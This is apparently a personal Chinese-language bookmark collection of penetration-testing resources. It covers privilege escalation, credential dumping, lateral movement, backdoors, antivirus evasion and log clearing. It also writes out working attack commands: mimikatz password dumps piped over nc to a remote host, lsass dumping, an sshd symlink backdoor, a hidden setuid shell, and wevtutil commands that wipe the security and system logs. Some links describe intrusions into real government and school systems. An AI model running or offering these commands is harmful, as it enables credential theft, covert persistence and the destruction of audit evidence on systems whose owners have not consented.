http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/
http://www.aptno1.com/YC/368.html
linux system函数提权
mysql以ROOT权限提权方法
http://www.cnblogs.com/sevck/p/5583004.html
http://blog.51cto.com/297020555/544763
Linux被动提权
http://www.nsfocus.com.cn/upload/contents/2015/03/o_19fepnsho122bcmt1jm211cb1l57b.pdf
PDF
Linux提权exp总结
https://github.com/SecWiki/linux-kernel-exploits
Linux非交互式提权
http://ecma.io/611.html
PDF
实战Linux下三种不同方式的提权技巧
http://bobao.360.cn/learning/detail/2984.html
Linux提权:从入门到放弃
http://www.freebuf.com/articles/system/129549.html
Basic Linux Privilege Escalation (英文版)
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
SUID Privilege Escalation
https://evi1cg.me/archives/SUID_Privilege_Escalation.html
对SUID可提权Root Shell的探究
http://www.freebuf.com/articles/system/149118.html
利用SUID提权root
https://www.jifucha.net/post/5.html
PDf
要登陆到系统、看着貌似成功率还不错
通过可写文件获取Root权限的多种方式
http://www.freebuf.com/articles/system/175086.html
Linux kernel: Exploitable memory corruption due to UFO to non-UFO path switch(CVE-2017-1000112)
https://www.seebug.org/vuldb/ssvid-96343
CVE-2018-1000001本地linux提权
https://paper.tuisec.win/detail/ba1071d4bb3b724
CVE-2017-1000367
Red Team 的一些技巧 https://tmr.js.org/p/c2e19bbc/
渗透技巧——导出Chrome浏览器中保存的密码
http://www.4hou.com/technology/10114.html
passcat //C++的密码查看工具
https://github.com/twelvesec/passcat
浏览器密码存储原理和渗透中的利用
https://paper.tuisec.win/detail/f4c4807022a0e26
从NTDS.dit获取密码hash的三种方法
http://www.freebuf.com/sectool/176876.html
获取用户hash的姿势
http://www.cnnetarmy.com/%E8%8E%B7%E5%8F%96%E7%94%A8%E6%88%B7hash%E7%9A%84%E5%A7%BF%E5%8A%BF/
PDF
Dumping Domain Password Hashes dump域hash
https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/
后渗透阶段的攻防对抗
https://04z.net/2017/06/23/Bypass-Privilege/
后渗透攻防的信息收集
https://www.secpulse.com/archives/51527.html
内网安全——利用NSA Smbtouch批量检测内网
https://3gstudent.github.io/3gstudent.github.io/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%88%A9%E7%94%A8NSA-Smbtouch%E6%89%B9%E9%87%8F%E6%A3%80%E6%B5%8B%E5%86%85%E7%BD%91/
-
一键抓取目标机器上的所有明文密码LaZagne
https://klionsec.github.io/2017/10/26/LaZagne/
https://github.com/AlessandroZ/LaZagne.git
https://github.com/AlessandroZ/LaZagne/releases/
本地密码查看工具LaZagne中的自定义脚本开发
http://www.4hou.com/tools/7404.html
已保存PDF -
渗透利器之本地客户端程序密码获取
http://wolvez.club/?p=498
-
抓取密码并传给远程服务器
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc -vv 192.168.3.251 1234
-
抓取密码重定向到TXT
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit >> shash.txt
-
procdump配合mimikatz(dump下来的文件要放在和目标系统一致的环境中执行)
Victimer # procdump64.exe -accepteula -ma lsass.exe lsass.dmp
attacker # mimikatz.exe
attacker # sekurlsa::minidump lsass.dmp
attacker # sekurlsa::logonPasswords full
- 抓取本地登陆远程桌面保持的密码,用的是Mimikatz
privilege::debug
vault::cred /patch
或
mimikatz.exe "privilege::debug" "vault::cred /path" "exit" >>1.txt
- 抓取VPN账号密码
- 姿势一
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "lsadump::secrets" "exit"
- 姿势二
http://www.nirsoft.net/utils/dialupass.html
密码破解系列
http://zeroyu.xyz/2017/10/28/密码破解系列/
[]内网渗透基础知识](http://mang0.me/archis/7db24e65/)
http://mang0.me/archis/7db24e65/
浅谈内网渗透流程
http://mang0.me/archis/17ef10d7/
从零开始内网渗透学习
https://github.com/l3m0n/pentest_study
史上最强内网渗透知识点总结 -Mhtml
https://mp.weixin.qq.com/s/U2MqcjA_YmMlajJzvDCZZw
内网备忘录 -Mhtml
https://tom0li.github.io/内网备忘录/
浅谈内网渗透流程
http://mang0.me/archis/17ef10d7/
内网只开135端口如何横向移动
http://www.4hou.com/technology/11794.html
内网剑客三结义 -Mhtml
http://www.5ecurity.cn/index.php/archives/227/
如何使用RDP中间人攻击进行横向渗透
http://www.4hou.com/penetration/11236.html
https://pentestlab.blog/2018/04/24/lateral-movement-rdp/
内网渗透(持续更新) #--# 不错的
http://rcoil.me/2017/06/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/
我所了解的内网渗透——内网渗透知识大总结 #--# 不错的
https://www.anquanke.com/post/id/92646
Mimikatz 非官方指南和命令参考_Part1
Mimikatz 非官方指南和命令参考_Part2
Mimikatz 非官方指南和命令参考_Part3
内网渗透中的mimikatz
Mimikatz ON Metasploit
内网安全之域服务账号破解实践
https://www.anquanke.com/post/id/85606
命令行下的信息搜集
http://www.secange.com/2017/08/%e5%91%bd%e4%bb%a4%e8%a1%8c%e4%b8%8b%e7%9a%84%e4%bf%a1%e6%81%af%e6%90%9c%e9%9b%86-2/
metasploit渗透测试之信息收集(一)
http://mp.weixin.qq.com/s/jULhbW8MbNSC2NGCt82y5A
MS17-010漏洞检测与内网穿透技术的应用(自身在内网的情况)
http://fuping.site/2017/04/21/MS17-010-Vulnerability-Detection-And-Ngrok/
CentOS 7 搭建ngrok服务器 内网穿透,从此不再需要花生壳
https://ubock.com/article/31
使用Powershell反弹Meterpreter Shell
http://www.mottoin.com/87266.html
了解一下,PowerShell的内网渗透之旅(一)
https://mp.weixin.qq.com/s?__biz=MzIwNDI4MzAwOA==&mid=2650525478&idx=1&sn=464c60ac990cb5552ab49537974d0152&chksm=8ecde2c9b9ba6bdf43cd10b6af898645bc697eb8478dea01d15c4c2dc3a2a196bdd58d2c7674&mpshare=1&scene=23&srcid=0507zSH6krf4H4wHkk4SKlvy#rd
内网渗透命令大全
https://www.t00ls.net/articles-39285.html
要内网渗透,要先打通与目标之间的网络
代理
http://b404.xyz/2017/11/29/proxy/#termite
使用 MSF 路由转发实现MSF框架的内网渗透
http://bobao.360.cn/learning/detail/4164.html
内网漫游之SOCKS代理大结局
https://www.anquanke.com/post/id/85494
内网渗透随想
https://www.secpulse.com/archives/5432.html
穿越边界的姿势
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484014&idx=1&sn=78fcbe24a3956ed1a0bf3fba594eb0d9
反弹转发代理穿透的姿势
http://www.cnnetarmy.com/%E5%8F%8D%E5%BC%B9%E8%BD%AC%E5%8F%91%E4%BB%A3%E7%90%86%E7%A9%BF%E9%80%8F%E7%9A%84%E5%A7%BF%E5%8A%BF/
PDF
烂泥:学习ssh之ssh隧道应用 //Nice型 https://blog.51cto.com/ilanni/1696162
SSH 隧道使用 //死活看不懂他的远程转发 https://tmr.js.org/p/c7e91764/
SSH隧道:内网穿透实战 https://cherrot.com/tech/2017/01/08/ssh-tunneling-practice.html
ssh端口转发:ssh隧道 https://www.zsythink.net/archives/2450
后渗透:ESXi反弹Shell
https://www.anquanke.com/post/id/93672
使用frp实现内网穿透
http://www.jianshu.com/p/e8e26bcc6fe6
内网穿透神器Frps一键安装脚本及设置教程
www.qzkyl.cn/post-184.html
MSF内网跳板详解
http://www.freebuf.com/sectool/56432.html
利用 hole 服务实现内网穿透
http://www.xuxiaobo.com/?p=4663
【合集】内网端口转发及穿透
https://xianzhi.aliyun.com/forum/read/1715.html
Intranet_penetration内网穿透
http://blog.7ell.me/2017/06/03/Intranet-penetration/
Web端口复用正向后门研究实现与防御
http://www.freebuf.com/articles/web/142628.html
用啥Ngrok,用SSH解决大局域网反向端口转发问题
http://www.freebuf.com/articles/network/142034.html
几款内网转发的工具
https://mp.weixin.qq.com/s/EWL9-AUB_bTf7pU4S4A2zg
内网端口转发及穿透
https://xianzhi.aliyun.com/forum/read/1715.html
使用SSH反向隧道进行内网穿透
https://0x9.me/yNWL5
reGeorg
http://blog.csdn.net/na_tion/article/details/47728121
-
初级域渗透系列 - 01. 基本介绍&信息获取
https://www.t00ls.net/thread-30541-1-1.html
-
初级域渗透系列 - 02. 常见攻击方法 - 1
https://www.t00ls.net/thread-30632-1-1.html
-
初级域渗透系列 - 03. 常见攻击方法 - 2
https://www.t00ls.net/thread-30781-1-1.html
Dumping Active Directory Domain Info – with PowerUpSQL!
https://blog.netspi.com/dumping-active-directory-domain-info-with-powerupsql/
-
域攻击之精准定位特权用户
https://www.anquanke.com/post/id/94461
-
域渗透的金之钥匙
https://www.secpulse.com/archives/40497.html
-
利用域委派获取域管理权限
https://www.anquanke.com/post/id/92484
-
域组策略种马-MS15011
http://www.triplekill.org/index.php/archives/16.html
-
利用域委派获取域管理权限
https://www.anquanke.com/post/id/92484
-
域内渗透(一)
https://zhuanlan.zhihu.com/p/22710907
-
内网渗透测试定位技术总结
http://www.mottoin.com/92978.html
-
域渗透TIPS:获取LAPS管理员密码
http://www.freebuf.com/articles/web/142659.html
-
如何通过 SSH 隧道进行域渗透的 PtT 攻击
http://paper.seebug.org/321/
-
域渗透之Exchange Server
http://bobao.360.cn/learning/detail/4145.html
-
使用Kerberoast破解Kerberos TGS票据:利用Kerberos突破活动目录域
http://bobao.360.cn/learning/detail/4256.html
-
如何使用ldapsearch来dump域中的LAPS密码
http://bobao.360.cn/learning/detail/4151.html
-
域攻击之精准定位特权用户
https://www.anquanke.com/post/id/94461
渗透测试:内网DNS投毒技术劫持会话
http://www.freebuf.com/articles/web/43157.html
Ettercap 使用进阶(1):详细参数
http://xiao106347.blog.163.com/blog/static/21599207820146302851904/
已保存为PDF
利用ettercap进行简单的arp欺骗和mitm攻击
https://www.secpulse.com/archives/6068.html
已保存为PDF
毒化内网两三事-用ettercap搞定邻家妹妹 heatlevel
https://bbs.ichunqiu.com/thread-11684-1-1.html
已保存为PDF
Junction Folders和Library Files的后门利用
http://www.4hou.com/technology/14467.html
利用WMI构建无文件后门
http://www.freebuf.com/column/165235.html
那些年,我们一起玩过的后门 #--#介绍了win和lin的后门
http://bobao.360.cn/learning/detail/3218.html
高级组合技打造“完美” 捆绑后门
https://evi1cg.me/archives/chm_backdoor.html
一种深度隐蔽的域后门方式
http://bobao.360.cn/learning/detail/4599.html
如何分析中国菜刀是否包含后门?
http://www.freebuf.com/articles/system/93323.html
Powershell之MOF后门
http://drops.xmd5.com/static/drops/tips-12354.html
手把手教你编写一个简单的PHP模块形态的后门
http://www.freebuf.com/articles/web/141911.html
如何基于Python写一个TCP反向连接后门
https://www.anquanke.com/post/id/92401
超级后门PLATINUM组织隐蔽通信工具分析(含演示视频)
http://bobao.360.cn/learning/detail/3967.html
【技术分享】CVE-2016-5483:利用mysqldump备份可生成后门
http://bobao.360.cn/learning/detail/3591.html
利用userinit注册表键实现无文件后门
https://www.anquanke.com/post/id/92707
简单后门
ln -sf /usr/sbin/sshd /tmp/su;nohup /tmp/su -oPort=2022 &
http://www.freebuf.com/articles/system/138753.html
留下后门:
root# cat /etc/shells
root# cp /bin/dash /var/tmp/.bdash
root# chmod a+s /var/tmp/.bdash
root# ls -ln /var/tmp/.bdash
调用:
postgres# cd /var/tmp
postgres# ./.bdash
# id
# tail /etc/shadow
Linux rootkit mafix
linux suid后门
Linux Rootkit系列一:LKM的基础编写及隐藏
http://www.freebuf.com/articles/system/54263.html
Linux Rootkit 系列二:基于修改 sys_call_table 的系统调用挂钩
http://www.freebuf.com/sectool/105713.html
Linux Rootkit系列三:实例详解 Rootkit 必备的基本功能
http://www.freebuf.com/articles/system/107829.html
Linux Rootkit 系列四:对于系统调用挂钩方法的补充
http://www.freebuf.com/articles/system/108392.html
Linux Rootkit 系列五:感染系统关键内核模块实现持久化
http://www.freebuf.com/articles/system/109034.html
使用Rkhunter检测Rootkit渗透
http://www.ywnds.com/?p=6905
Linux PAM&&PAM后门
http://cb.drops.wiki/drops/tips-1288.html
Linux环境下后门维持的N种姿势
http://www.tuicool.com/articles/eIv22az
一款短小精致的SSH后门分析
http://www.freebuf.com/articles/system/140880.html
Linux后门整理合集(脉搏推荐)
https://www.secpulse.com/archives/59674.html
如何优雅的维持住一个Web shell
https://ub3r.cn/?p=30
-- 保存
奇淫异巧之 PHP 后门
https://mp.weixin.qq.com/s/RPMzhspueI91PfJbUQgclg
MHTML
php 后门隐藏技巧
https://mp.weixin.qq.com/s/wyH0Rr4IX3Vv552_tR3ImA
MHTML
php一句话木马集合
http://www.cnnetarmy.com/php%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E9%9B%86%E5%90%88/
Proof of Concept exploit for CVE-2017-8570
http://www.freebuf.com/articles/system/161854.html
https://github.com/rxwx/CVE-2017-8570
CVE-2017-11882结合Cobalt Strike使用
http://lr3800.com/2017/11/22/cobalt-strike-3-8%E7%A0%B4%E8%A7%A3%E7%89%88/
PDF
也谈Weblogic漏洞CVE-2017-10271的利用方法
http://www.freebuf.com/vuls/160367.html
CVE-2017-8570 OFFICE远程命令执行
http://qq1.ltd/?p=32
Office DDE多种利用方式已公开
http://bobao.360.cn/learning/detail/4592.html
已保存PDF
CVE-2017-8759复现 又是office
https://ub3r.cn/?p=66
Office高级威胁漏洞在野利用分析
http://bobao.360.cn/learning/detail/4220.html
ppt文档钓鱼新思路结合powershell后门利用
https://0x9.me/PCZHn
震网三代 CVE-2017-8464
http://t.cn/RCD6Oqv
-
WebLogic XMLDecoder反序列化漏洞直接getshell(思路分享)
https://forum.90sec.org/forum.php?mod=viewthread&tid=10886
-
CVE-2017-10271
https://github.com/kkirsche/CVE-2017-10271
-
CVE-2017-7504 - JBossMQ JMS
https://github.com/joaomatosf/JavaDeserH2HC/
-
CVE-2017-12149 - JBoss 6.X and EAP 5.X
https://github.com/joaomatosf/JavaDeserH2HC/
-
JMX RMI 攻击利用
https://threathunter.org/topic/599e8aebec721b1f1966e976
-
Exploiting struts2-rest XStream Deserialization with Reverse Shell
https://github.com/joaomatosf/JavaDeserH2HC/
- RCE
-
CVE-2017-6736 远程代码执行漏洞分析
https://www.anquanke.com/post/id/98225
POC ===>https://github.com/artkond/cisco-snmp-rce
https://github.com/GarnetSunset/CiscoSpectreTakeover
-
CVE-2017-0629
利用Pentestbox打造MS17-010移动"杀器"
http://www.freebuf.com/articles/system/132274.html
MS17-010原版
https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master
LNKUp:生成恶意LNK文件payload用于渗出数据
https://github.com/Plazmaz/LNKUp
IIS6.0 CVE-2017-7269 批量检测POC
https://0x9.me/UmMNP
CVE–2017–8543 Windows Search远程代码执行漏洞预警(含演示)
http://bobao.360.cn/learning/detail/4204.html
EXP-CVE-2016-3935
https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2016-3935
全面复现Esteemaudit利用过程(含域环境搭建过程)
http://bobao.360.cn/learning/detail/4021.html
通过一些姿势来免杀/绕过杀软、waf
根据powershell语言的特性来混淆代码的方法与原理
http://bobao.360.cn/learning/detail/4266.html
Analysing Msfvenom Payloads
https://rastating.github.io/analysing-msfvenom-payloads/
经验分享 | 一句话免杀编写思路
http://www.freebuf.com/articles/system/164076.html
披着羊皮的狼:如何利用Windows图标显示漏洞伪装PE文件
http://bobao.360.cn/learning/detail/4230.html
Metasploit+python生成免杀exe过360杀毒
https://www.cnblogs.com/backlion/p/6785870.html
PHP之一句话木马 Nice
https://xz.aliyun.com/t/2786
过360 云锁 安全狗添加管理员账户 NETAPI32 源码+成品
https://www.t00ls.net/thread-41913-1-1.html
Bypass 护卫神SQL注入防御(多姿势)
https://mp.weixin.qq.com/s/f0laS8pfInZpNpz2UKuG3w
Bypass 360主机卫士SQL注入防御(多姿势)
https://www.cnblogs.com/xiaozi/p/9132737.html
Bypass ngx_lua_waf SQL注入防御(多姿势)
https://www.cnblogs.com/xiaozi/p/9138126.html
Bypass安全狗防注入、防上传等
www.lsafe.org/?p=314
Meterpreter免杀技巧分享
http://wolvez.club/?p=327
Veil3.1免杀安装/
http://hone.cool/2018/03/23/Veil3.1%E5%85%8D%E6%9D%80%E5%AE%89%E8%A3%85/
MHTML
MSF免杀的几种方法
http://qq1.ltd/?p=73
免杀 MSF Windows Payload 的方法与实践
https://dayu.ink/MianshaMSFWindowsPayload.html
http://s.yl0.org/2017/12/21/%E5%85%8D%E6%9D%80%20MSF%20Windows%20Payload%20%E7%9A%84%E6%96%B9%E6%B3%95%E4%B8%8E%E5%AE%9E%E8%B7%B5.html
[]免杀原理与实践——使用msfvenom与veil绕过杀毒软件](https://blog.csdn.net/wyf12138/article/details/79825833)
https://blog.csdn.net/wyf12138/article/details/79825833
Windows Payload免杀方法实验
http://www.freebuf.com/articles/system/156710.html
打造不被检测的Metasploit WAR
http://www.secange.com/2017/09/%E6%89%93%E9%80%A0%E4%B8%8D%E8%A2%AB%E6%A3%80%E6%B5%8B%E7%9A%84metasploit-war/
工具解析|杀毒引擎惨遭打脸,黑帽大会爆惊天免杀工具
http://www.freebuf.com/news/142758.html
简介三款免杀工具(含BLACKHAT最新工具)
https://mp.weixin.qq.com/s/PfemhJ6uQyCtBAFbqyGLKA
使用Python检测并绕过Web应用程序防火墙
http://www.freebuf.com/articles/web/138589.html
【Blackhat】avet:杀软绕过工具使用教程
http://bobao.360.cn/learning/detail/4196.html
绕过杀软执行payload
http://wolvez.club/?p=686
Cobalt Strike + Shellter, shell beacon FUD bypass AV
https://www.youtube.com/watch?v=ykwcG7dXrmE
Anti-AntiVirus
https://04z.net/2017/08/14/Anti-AntiVirus/
python加密代码
http://rcoil.me/2017/04/armitage%E4%BD%BF%E7%94%A8/
深入理解SQL注入绕过WAF和过滤机制
http://www.cnblogs.com/r00tgrok/p/SQL_Injection_Bypassing_WAF_And_Evasion_Of_Filter.html
MYSQL注入绕某狗fuzz工具-python多线程
https://www.t00ls.net/thread-42865-1-1.html
编写简单tamper绕过encode编码
https://www.t00ls.net/articles-37790.html
清除所有日志
wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
wevtutil
Windows登录日志详解
https://blog.csdn.net/zhulinu/article/details/52747984
Windows单条日志清除(一)——删除思路与实例
https://www.secpulse.com/archives/73273.html
Windows 常见log位置
https://blog.csdn.net/holandstone/article/details/7645709
如何检测PowerShell攻击活动
http://bobao.360.cn/learning/detail/4724.html
Linux应急响应姿势浅谈
http://bobao.360.cn/learning/detail/4481.html
shell在手分析服务器日志不愁
https://segmentfault.com/a/1190000009745139
通过服务器日志溯源web应用攻击路径
http://www.freebuf.com/articles/web/138867.html
快速自检电脑是否被黑客入侵过(Linux版)
http://www.freebuf.com/articles/system/157597.html
Linux应急响应姿势浅谈
http://bobao.360.cn/learning/detail/4481.html
渗透测试TIPS之删除、伪造Linux系统登录Windows登录日志详解
http://www.freebuf.com/articles/system/141474.html
服务器运维丨谁动了我的主机之History命令
https://www.secpulse.com/archives/59375.html
看我如何用20行代码做日志分析
https://www.secpulse.com/archives/59608.html
快速自检电脑是否被黑客入侵过(Windows版)
http://m.imooc.com/article/21236
PDF
Windows 日志攻防之攻击篇
https://threathunter.org/topic/593eb1bbb33ad233198afcfa
渗透技巧——Windows日志的删除与绕过
http://t.cn/RoDwJPM
Linux基线加固
http://mp.weixin.qq.com/s/0nxiZw1NUoQTjxcd3zl6Zg
内网安全检查/渗透总结
https://xz.aliyun.com/t/2354
《Web安全攻防-渗透测试实战指南》读书笔记
http://mang0.me/archis/924987ad/
端口渗透总结
http://docs.ioin.in/writeup/blog.heysec.org/_archives_577/index.html
渗透测试TIPS之Web(一)
https://mp.weixin.qq.com/s/Ht-z8NClOQr72tWHItEX2g
乙方渗透测试之Fuzz爆破
http://www.cnnetarmy.com/%E4%B9%99%E6%96%B9%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B9%8Bfuzz%E7%88%86%E7%A0%B4/
HTML
Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结
http://www.hack80.com/thread-22662-1-1.html
PDF
浅谈中间件漏洞与防护
https://thief.one/2017/05/25/1/
PDF
拿下webshell之后小朋友们应该怎么做
https://paper.tuisec.win/detail/19d3fae27653722
知其一不知其二之Jenkins Hacking
https://www.secpulse.com/archives/2166.html
挖掘漏洞的高级方法和思维(Part.1)
http://www.4hou.com/vulnerable/8376.html
挖掘漏洞的高级方法和思维(Part.2)
http://www.4hou.com/info/news/8397.html
wordpress日常入侵方法
http://mp.weixin.qq.com/s/EPkVCpsCts215-oNiCR0Ow
不同行业网站漏洞集合
http://wap.qidian.qq.com/ol/rest/view/2852153209_10348_2_1509097834
PDF
黑客是如何入侵网站?渗透测试基本思路
http://hackjason.com/post-50.html
关于企业的渗透测试流程
http://www.jianshu.com/p/d85a94767ef1
包括不限于WEB渗透、内网渗透的各种精品案例,并保存为PDF存在本地
如何通过一台电脑黑掉一个国家?
https://www.08sec.com/reprinted/16348.html
“无文件”攻击方式渗透实验
http://www.freebuf.com/articles/system/129228.html
一次综合渗透测试
https://xz.aliyun.com/t/5128
【渗透技巧】浅谈常规渗透瓶颈,实例发散思维突破
http://mp.weixin.qq.com/s/kiOAk2VfgkS51A_gwd23qw?client=tim&ADUIN=1573440640&ADSESSION=1512697227&ADTAG=CLIENT.QQ.5531_.0&ADPUBNO=26745
一次艰难的渗透提权过程 https://mp.weixin.qq.com/s/PRgeI9FP4idaZ1fTIoAWLQ
日一个毛片网站
https://www.luolikong.vip/index.php/archives/369/
ebLogic SSRF + Redis内网入侵
http://ecma.io/607.html
etasploit驰骋内网直取域管首级
https://www.anquanke.com/post/id/85518
-
我是如何通过命令执行到最终获取内网Root权限的
http://www.freebuf.com/articles/web/141579.html
-
美图内网漫游(沦陷大量内部系统、内部服务器权限、企业架构、企业邮箱等敏感信息)
https://www.secpulse.com/archives/35645.html
以下几篇为silic的核心成员bodylive的文章
-
换个思路,对某培训机构进行一次 YD 的社工检测
https://bobylive.com/static/1936996
-
无意射进学籍档案管理系统
https://bobylive.com/static/1935888
-
大数据推倒兄弟学校主页
https://bobylive.com/static/1936440
-
一次学校图书馆的渗透检测
https://bobylive.com/static/1936901
以下几篇为Silic Group的文章
-
进入越南财政部内网部分细节
https://silic.wiki/%E4%B9%A0%E7%A7%91%E6%97%A7%E7%AB%99:%E8%BF%9B%E5%85%A5%E8%B6%8A%E5%8D%97%E8%B4%A2%E6%94%BF%E9%83%A8%E5%86%85%E7%BD%91%E9%83%A8%E5%88%86%E7%BB%86%E8%8A%82
-
韩国大纪元过程 - 原内部参阅
https://silic.wiki/%E4%B9%A0%E7%A7%91%E6%97%A7%E7%AB%99:%E9%9F%A9%E5%9B%BD%E5%A4%A7%E7%BA%AA%E5%85%83%E8%BF%87%E7%A8%8B
-
apt持续性综合渗透经验谈第一讲-从web到pc
https://silic.wiki/%E4%B9%A0%E7%A7%91%E6%97%A7%E7%AB%99:apt%E6%8C%81%E7%BB%AD%E6%80%A7%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F%E7%BB%8F%E9%AA%8C%E8%B0%88%E7%AC%AC%E4%B8%80%E8%AE%B2-%E4%BB%8Eweb%E5%88%B0pc
-
pt持续性综合渗透经验谈第二讲-从web到pc
https://silic.wiki/%E4%B9%A0%E7%A7%91%E6%97%A7%E7%AB%99:apt%E6%8C%81%E7%BB%AD%E6%80%A7%E7%BB%BC%E5%90%88%E6%B8%97%E9%80%8F%E7%BB%8F%E9%AA%8C%E8%B0%88%E7%AC%AC%E4%BA%8C%E8%AE%B2-%E4%BB%8Eweb%E5%88%B0pc
-
小说_习科论坛作战故事
https://silic.wiki/_media/%E4%B9%A0%E7%A7%91%E6%97%A7%E7%AB%99:%E5%B0%8F%E8%AF%B4_%E4%B9%A0%E7%A7%91%E8%AE%BA%E5%9D%9B%E4%BD%9C%E6%88%98%E6%95%85%E4%BA%8B.pdf
暗网漫游记
http://www.cnnetarmy.com/%E6%9A%97%E7%BD%91%E6%BC%AB%E6%B8%B8%E8%AE%B0/
.
elk操作相关
http://jkme.github.io/elk-log.html
mht
使用Windows命令行reg控制注册表键值
https://www.qingsword.com/qing/163.html
MongoDB入门之索引篇
https://paper.tuisec.win/detail/eaa790a3fa30d03
HP代码审计导图
https://www.cdxy.me/?p=779
一些有趣的代码审计“小”题目
https://github.com/CHYbeta/Code-Audit-Challenges
vaeThink v1.0.1 代码执行漏洞挖掘分析
https://www.anquanke.com/post/id/178297
管理员头像只有前端验证、后台添加菜单的规则插入恶意代码可以写shell。